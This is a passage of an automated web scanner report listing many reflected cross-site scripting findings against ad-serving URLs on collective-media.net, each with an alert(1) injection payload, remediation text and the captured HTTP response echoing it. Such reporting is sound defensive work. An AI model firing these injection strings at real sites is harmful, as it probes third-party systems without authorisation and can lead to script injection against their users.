Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a879'-alert(1)-'64a75099063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8840e'-alert(1)-'d174ab07fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/ent_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b65f'-alert(1)-'bf030976c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cedc7'-alert(1)-'a9dad4ab33d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2596'-alert(1)-'065299ab6fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b4c'-alert(1)-'8f565e9fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86cf3'-alert(1)-'c4fb3c8bde4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1595'-alert(1)-'d3ce0ff70fa was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b93'-alert(1)-'1cfbaccfaf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 8338 Date: Sat, 17 Sep 2011 01:49:07 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30420328179_1316224147","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald11b93'-alert(1)-'1cfbaccfaf5&size=728x90&imp_id=cm-30420328179_1316224147,12298b058f07061&referrer=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldint ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a58b8(a)cb7eca68845 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 8090 Date: Sat, 17 Sep 2011 01:48:50 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d0f'-alert(1)-'238029b5c84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 01:13:29 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7400
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30221086088_1316222009","http://ad.doubleclick.net/adj67d0f'-alert(1)-'238029b5c84/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30221086088_1316222009,12298b058f07061,polit,;;cmw=owl;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8c69'-alert(1)-'5b29faf592d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Date: Sat, 17 Sep 2011 01:13:33 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30501481718_1316222013","http://ad.doubleclick.net/adj/iblocal.revinet.bostonheraldf8c69'-alert(1)-'5b29faf592d/audience;net=iblocal;u=,iblocal-30501481718_1316222013,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60a13'-alert(1)-'30c480b6c14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 01:13:37 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7392
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30201561711_1316222017","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience60a13'-alert(1)-'30c480b6c14;net=iblocal;u=,iblocal-30201561711_1316222017,12298b058f07061,polit,;;sz=160x600;net=iblocal;env=ifr;ord1=449493;contx=polit;dc=s;btg=;ord=%23PCACHEBUSTER?","160","600",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 743e9'-alert(1)-'e734a6f0a30 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 01:13:20 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7353
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... iveMedia.createAndAttachAd("iblocal-30322160699_1316222000","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-30322160699_1316222000,12298b058f07061,none,;;sz=743e9'-alert(1)-'e734a6f0a30;contx=none;dc=s;btg=?","743e9'-alert(1)-'e734a6f0a30","",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80447'-alert(1)-'f91ca21afff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7358 Date: Sat, 17 Sep 2011 01:09:51 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219867092_1316221791","http://ad.doubleclick.net/adj80447'-alert(1)-'f91ca21afff/q1.bosherald/be_news;net=q1;u=,q1-30219867092_1316221791,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb6'-alert(1)-'9d423e3fbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7357 Date: Sat, 17 Sep 2011 01:09:52 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419616533_1316221792","http://ad.doubleclick.net/adj/q1.bosherald87eb6'-alert(1)-'9d423e3fbe/be_news;net=q1;u=,q1-30419616533_1316221792,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7479'-alert(1)-'d7ae9e9aabb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7358 Date: Sat, 17 Sep 2011 01:09:53 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30503457423_1316221793","http://ad.doubleclick.net/adj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;net=q1;u=,q1-30503457423_1316221793,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7744'-alert(1)-'53b38ddfa3a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7330 Date: Sat, 17 Sep 2011 01:09:49 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... ge="Javascript">CollectiveMedia.createAndAttachAd("q1-30207990841_1316221788","http://ad.doubleclick.net/adj/q1.bosherald/be_news;net=q1;u=,q1-30207990841_1316221788,12298b058f07061,none,;;cmw=nurl;sz=a7744'-alert(1)-'53b38ddfa3a;contx=none;dc=s;btg=?","a7744'-alert(1)-'53b38ddfa3a","",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d09a'-alert(1)-'33f55d64be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 01:20:15 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105513189_1316222415","http://ad.doubleclick.net/adj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;net=q1;u=,q1-30105513189_1316222415,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fae6'-alert(1)-'317c5c0c938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 01:20:19 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30323483817_1316222419","http://ad.doubleclick.net/adj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;net=q1;u=,q1-30323483817_1316222419,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0fe9'-alert(1)-'e1c69b32c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 01:20:21 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419507438_1316222421","http://ad.doubleclick.net/adj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;net=q1;u=,q1-30419507438_1316222421,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df0e3'-alert(1)-'44b07b60aae was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7329 Date: Sat, 17 Sep 2011 01:20:07 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... age="Javascript">CollectiveMedia.createAndAttachAd("q1-30421855631_1316222407","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-30421855631_1316222407,12298b058f07061,none,;;cmw=nurl;sz=df0e3'-alert(1)-'44b07b60aae;contx=none;dc=s;btg=?","df0e3'-alert(1)-'44b07b60aae","",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8832c'-alert(1)-'b89805fab1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7353 Date: Sat, 17 Sep 2011 01:09:53 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30423216503_1316221793","http://ad.doubleclick.net/adj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;net=q1;u=,q1-30423216503_1316221793,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbba4'-alert(1)-'e84b40c6dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7353 Date: Sat, 17 Sep 2011 01:09:54 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30101077229_1316221794","http://ad.doubleclick.net/adj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;net=q1;u=,q1-30101077229_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f033d'-alert(1)-'85ce176899a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7353 Date: Sat, 17 Sep 2011 01:09:54 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30223795082_1316221794","http://ad.doubleclick.net/adj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;net=q1;u=,q1-30223795082_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48057'-alert(1)-'6d221538d81 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Content-Length: 7327 Date: Sat, 17 Sep 2011 01:09:50 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... guage="Javascript">CollectiveMedia.createAndAttachAd("q1-30113229668_1316221790","http://ad.doubleclick.net/adj/q1.bosherald/news;net=q1;u=,q1-30113229668_1316221790,12298b058f07061,none,;;cmw=nurl;sz=48057'-alert(1)-'6d221538d81;contx=none;dc=s;btg=?","48057'-alert(1)-'6d221538d81","",true);</scr'+'ipt> ...[SNIP]...
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72a06'%3balert(1)//5908bbe03b7 was submitted in the u parameter. This input was echoed as 72a06';alert(1)//5908bbe03b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
